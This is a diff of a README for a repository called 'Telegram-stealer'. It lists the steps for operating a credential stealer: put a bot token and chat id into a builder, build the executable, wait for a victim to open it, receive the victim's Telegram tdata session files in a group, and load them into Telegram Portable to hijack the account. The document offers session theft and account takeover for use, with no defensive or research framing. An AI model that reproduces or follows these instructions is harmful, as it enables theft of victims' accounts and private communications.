nolimanom/Telegram-stealer/README.md

 # How 2 use
-1.compile builder for the stealer ( Or use precompiled ) 2.open builder and insert token and chat id
+1.compile builder for the stealer ( Or use precompiled ) 2.open builder and insert token and chat id ( place templater.rs along with builder ) 3.build stealer
-3.build stealer
 4.wait for victim to open exe
-5.tdata will be send to group
+5.tdata will be send to assigned group id
 6.download telegram portable
 7.copy tdata to telegram portable folder
 8.open telegram portable